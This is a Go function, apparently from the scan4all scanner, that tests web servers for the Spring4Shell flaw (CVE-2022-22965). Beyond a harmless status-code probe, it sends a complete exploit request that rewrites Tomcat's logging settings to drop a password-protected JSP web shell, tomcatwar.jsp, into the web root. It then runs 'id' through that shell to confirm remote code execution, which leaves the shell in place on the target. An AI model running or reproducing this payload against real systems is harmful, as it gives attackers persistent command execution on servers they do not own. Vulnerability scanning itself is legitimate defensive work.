package Springboot

import (
	"github.com/GhostTroops/scan4all/lib/socket"
	"github.com/GhostTroops/scan4all/lib/util"
	"net/url"
	"strings"
)

func CVE_2022_22965(u string) bool {
	if oU, err := url.Parse(u); nil == err && oU.Host != "" {
		szUrl := oU.Scheme + "://" + oU.Host
		if req, err := util.HttpRequset(szUrl+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
			if req.StatusCode == 500 {
				if req2, err := util.HttpRequset(szUrl+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
					if req2.StatusCode == 200 {
						return true
					}
				}
			}
		}

		cc := socket.NewCheckTarget(u, "tcp", 50)
		defer cc.Close()
		cc.SendPayload([]byte(strings.ReplaceAll(`GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: `+oU.Host+`
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

`, "\n", "\r\n")), 1)
		s1 := cc.SendPayload([]byte(strings.ReplaceAll(`GET /tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1
Host: `+oU.Host+`
Connection: close

`, "\n", "\r\n")), 1)
		if strings.Contains(s1, "uid=") && strings.Contains(s1, "gid=") {
			util.SendLog(oU.Scheme+"://"+oU.Host+"/tomcatwar.jsp?pwd=j&cmd=id", "Springboot", "RCE", "")
			return true
		}
	}
	return false
}
